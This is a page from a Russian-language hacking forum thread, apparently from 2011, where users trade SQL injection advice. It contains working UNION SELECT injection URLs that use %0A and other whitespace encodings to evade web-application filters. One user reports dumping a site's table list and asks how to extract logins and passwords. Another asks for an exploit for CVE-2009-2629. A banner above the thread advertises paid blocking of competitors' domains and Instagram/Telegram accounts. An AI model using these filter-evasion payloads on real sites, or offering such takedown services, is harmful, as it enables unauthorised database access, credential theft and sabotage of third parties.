УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1823 из 2438

1823

Опции темы

Поиск в этой теме

Опции просмотра

#18221

01.10.2011, 17:53

d1v

Новичок

Регистрация: 21.02.2009

Сообщений: 3

Провел на форуме:
58401

Репутация: 0

Цитата:

Сообщение от OxoTnik

OxoTnik said:
при вводе последнего в запрос
"+from+information_schema.tables--"
выкидывает на хостинг типа небезопасный запрос, как с этим бороться?

разбей запрос на 2 строки c помощью %0A

http://www.site.ru/comment.php?idart=-11364+union+%0A+select+1,2,table_name,4,5,6+from+i nformation_schema.tables--

#18222

01.10.2011, 18:00

OxoTnik

Guest

Сообщений: n/a

Провел на форуме:
290351

Репутация: 173

Цитата:

Сообщение от d1v

d1v said:
разбей запрос на 2 строки c помощью %0A
http://www.site.ru/comment.php?idart=-11364+union+%0A+select+1,2,table_name,4,5,6+from+i nformation_schema.tables--

Примного благодарен!!!

только мне не понятно: %0A какую функцию делает или вообще что это?

#18223

01.10.2011, 18:01

d1v

Новичок

Регистрация: 21.02.2009

Сообщений: 3

Провел на форуме:
58401

Репутация: 0

Цитата:

Сообщение от OxoTnik

OxoTnik said:
Примного благодарен!!!
только мне не понятно: %0A какую функцию делает или вообще что это?

это enter

на свебе блочится конструкция union select from, чтобы обойти фильтр разбиваем запрос на несколько строк.

#18224

01.10.2011, 18:05

er9j6@

Guest

Сообщений: n/a

Провел на форуме:
107835

Репутация: 23

Цитата:

Сообщение от OxoTnik

OxoTnik said:
Ужасы рассказал, примного благодарен))

Помимо самого пробела есть еще несколько пробельных символов, которые MySQL воспринимает как пробел, это:

%09 – табуляция

%0A – символ новой строка

%0D – возврат каретки

%0B – вертикальная табуляция

%0C – символ новой страницы

Какой нибудь из этих символов может да и пропустит фильтр. Пример:

http://xxx/news.php?id=1'%09UNION%09SELECT%091,2,3,4,5,6%09FR OM%09Users%0 9WHERE%09login='admin'#

#18225

01.10.2011, 18:10

d1v

Новичок

Регистрация: 21.02.2009

Сообщений: 3

Провел на форуме:
58401

Репутация: 0

Цитата:

Сообщение от er9j6@

er9j6@ said:
Помимо самого пробела есть еще несколько пробельных символов, которые MySQL воспринимает как пробел, это:
%09 – табуляция
%0A – символ новой строка
%0D – возврат каретки
%0B – вертикальная табуляция
%0C – символ новой страницы
Какой нибудь из этих символов может да и пропустит фильтр. Пример:
http://xxx/news.php?id=1'%09UNION%09SELECT%091,2,3,4,5,6%09FR OM%09Users%0 9WHERE%09login='admin'#

блочится конструкция union select from, находящаяся на одной строке, т.е. поможет только символ переноса строки.

#18226

01.10.2011, 18:10

OxoTnik

Guest

Сообщений: n/a

Провел на форуме:
290351

Репутация: 173

Цитата:

Сообщение от None

sait/comment.php?idart=-11364+union+%0A+select+1,2,table_name,4,5,6+from+i nformation_schema.tables--

этот запрос вывел мой таблички на ура

и есть таблицаusers как его вывести? а потом с него логин и пасс, может кто нибудь чуток обьяснить?

хостинг свеб!

#18227

01.10.2011, 18:12

d1v

Новичок

Регистрация: 21.02.2009

Сообщений: 3

Провел на форуме:
58401

Репутация: 0

Цитата:

Сообщение от OxoTnik

OxoTnik said:
этот запрос вывел мой таблички на ура
и есть таблица
users
как его вывести? а потом с него логин и пасс, может кто нибудь чуток обьяснить?
хостинг свеб!

/thread43966-sql+faq.html

#18228

01.10.2011, 18:25

d1v

Новичок

Регистрация: 21.02.2009

Сообщений: 3

Провел на форуме:
58401

Репутация: 0

Цитата:

Сообщение от OxoTnik

OxoTnik said:
там рассказываеться как вытащить с помощью лимита, только у меня вообще так не прокатывает...

читай всё! кури, пробуй.

пункт 4.2 прочитай особеннно внимательно.

#18229

01.10.2011, 18:35

Ulitko

Guest

Сообщений: n/a

Провел на форуме:
4389

Репутация: 0

подскажите запрос к mssql, чтобы вывести определенные столбцы в отдельный текстовик

#18230

01.10.2011, 18:37

Kuteke

Guest

Сообщений: n/a

Провел на форуме:
60692

Репутация: 6

CVE-2009-2629

Есть эксплойт? Поделитесь!

Страница 1823 из 2438

1823

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход